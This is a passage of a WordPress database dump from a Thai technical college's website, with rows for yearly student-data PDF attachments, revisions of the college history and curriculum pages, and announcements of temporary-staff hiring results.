(2453, 3, '2018-05-10 13:54:02', '2018-05-10 06:54:02', '', 'ข้อมูลนักเรียน นักศึกษา 2555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-8', '', '', '2018-05-10 13:54:02', '2018-05-10 06:54:02', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf', 0, 'attachment', 'application/pdf', 0),
(2454, 3, '2018-05-10 13:54:04', '2018-05-10 06:54:04', '', 'ข้อมูลนักเรียน นักศึกษา 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-9', '', '', '2018-05-10 13:54:04', '2018-05-10 06:54:04', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf', 0, 'attachment', 'application/pdf', 0),
(2455, 3, '2018-05-10 13:54:06', '2018-05-10 06:54:06', '', 'ข้อมูลนักเรียน นักศึกษา 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-10', '', '', '2018-05-10 13:54:06', '2018-05-10 06:54:06', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(2456, 3, '2018-05-10 13:54:07', '2018-05-10 06:54:07', '', 'ข้อมูลนักเรียน นักศึกษา 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-11', '', '', '2018-05-10 13:54:07', '2018-05-10 06:54:07', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(2457, 3, '2018-05-10 13:54:09', '2018-05-10 06:54:09', '', 'ข้อมูลนักเรียน นักศึกษา 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-12', '', '', '2018-05-10 13:54:09', '2018-05-10 06:54:09', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(2458, 3, '2018-05-10 13:54:10', '2018-05-10 06:54:10', '', 'ข้อมูลนักเรียน นักศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-13', '', '', '2018-05-10 13:54:10', '2018-05-10 06:54:10', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(2459, 3, '2018-05-10 13:58:02', '2018-05-10 06:58:02', '<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2446-revision-v1', '', '', '2018-05-10 13:58:02', '2018-05-10 06:58:02', '', 2446, 'http://www.technicrayong.ac.th/2446-revision-v1/', 0, 'revision', '', 0),
(2462, 3, '2018-05-10 14:06:56', '2018-05-10 07:06:56', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-autosave-v1', '', '', '2018-05-10 14:06:56', '2018-05-10 07:06:56', '', 1000, 'http://www.technicrayong.ac.th/1000-autosave-v1/', 0, 'revision', '', 0),
(2464, 3, '2018-05-11 16:02:42', '2018-05-11 09:02:42', '', '1', '', 'inherit', 'closed', 'closed', '', '1-3', '', '', '2018-05-11 16:02:42', '2018-05-11 09:02:42', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/1-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2466, 3, '2018-05-11 16:08:11', '2018-05-11 09:08:11', '', '3', '', 'inherit', 'closed', 'closed', '', '3-2', '', '', '2018-05-11 16:08:11', '2018-05-11 09:08:11', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/3-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2467, 3, '2018-05-11 16:08:28', '2018-05-11 09:08:28', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-11 16:08:28', '2018-05-11 09:08:28', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2468, 3, '2018-05-11 16:11:42', '2018-05-11 09:11:42', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full aligncenter\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-11 16:11:42', '2018-05-11 09:11:42', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2470, 3, '2018-05-11 23:18:23', '2018-05-11 16:18:23', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81', '', '', '2018-05-11 23:20:58', '2018-05-11 16:20:58', '', 0, 'http://www.technicrayong.ac.th/?p=2470', 425, 'post', '', 0),
(2471, 3, '2018-05-11 23:17:52', '2018-05-11 16:17:52', '', 'ประกาศผล ครูอัตราจ้าง ก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-%e0%b8%81%e0%b9%88', '', '', '2018-05-11 23:17:52', '2018-05-11 16:17:52', '', 2470, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศผล-ครูอัตราจ้าง-ก่อสร้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(2472, 3, '2018-05-11 23:17:55', '2018-05-11 16:17:55', '', 'ประกาศผล จนท.วิทยบริการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5-%e0%b8%88%e0%b8%99%e0%b8%97-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-11 23:17:55', '2018-05-11 16:17:55', '', 2470, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ประกาศผล-จนท.วิทยบริการ.pdf', 0, 'attachment', 'application/pdf', 0),
(2473, 3, '2018-05-11 23:18:23', '2018-05-11 16:18:23', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกชั่วคราว ทำหน้าที่ ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2470-revision-v1', '', '', '2018-05-11 23:18:23', '2018-05-11 16:18:23', '', 2470, 'http://www.technicrayong.ac.th/2470-revision-v1/', 0, 'revision', '', 0),
(2475, 3, '2018-05-11 23:22:41', '2018-05-11 16:22:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%88%E0%B8%99%E0%B8%97.%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่งานวิทยบริการ จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81-2', '', '', '2018-05-11 23:22:41', '2018-05-11 16:22:41', '', 0, 'http://www.technicrayong.ac.th/?p=2475', 424, 'post', '', 0),
(2476, 3, '2018-05-11 23:21:07', '2018-05-11 16:21:07', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2470-autosave-v1', '', '', '2018-05-11 23:21:07', '2018-05-11 16:21:07', '', 2470, 'http://www.technicrayong.ac.th/2470-autosave-v1/', 0, 'revision', '', 0),
(2477, 3, '2018-05-11 23:20:58', '2018-05-11 16:20:58', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง สาขาวิชาช่างก่อสร้าง จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2470-revision-v1', '', '', '2018-05-11 23:20:58', '2018-05-11 16:20:58', '', 2470, 'http://www.technicrayong.ac.th/2470-revision-v1/', 0, 'revision', '', 0),
(2478, 3, '2018-05-11 23:22:41', '2018-05-11 16:22:41', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5-%E0%B8%88%E0%B8%99%E0%B8%97.%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%9A%E0%B8%A3%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่งานวิทยบริการ จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '2475-revision-v1', '', '', '2018-05-11 23:22:41', '2018-05-11 16:22:41', '', 2475, 'http://www.technicrayong.ac.th/2475-revision-v1/', 0, 'revision', '', 0),
